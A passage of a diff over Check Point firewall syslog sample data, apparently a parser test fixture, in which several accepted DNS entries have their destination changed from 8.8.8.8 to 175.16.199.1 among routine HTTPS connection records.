service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x5,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"88.221.161.146"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42754"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.54.95"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38162"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46059"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59268"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47423"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x6,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46059"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59268"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501042"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47423"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x7,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.11"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51844"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:22Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d372,0x8,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.55.16"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52760"; service:"443"; service_id:"https"; 
src:"192.168.2.2"] -<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59627"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56317"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44832"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59627"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"57512"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56317"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44832"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"136.243.95.176"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54030"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34455"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"34455"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x5,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.218"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54642"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x6,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.218"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54644"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x7,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"185.33.223.218"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54646"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x8,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33672"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x8,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"33672"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.48.174.89"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54848"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"54.194.133.25"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45034"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"195.88.55.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60510"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T16:57:23Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d373,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501043"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47595"; service:"53"; 
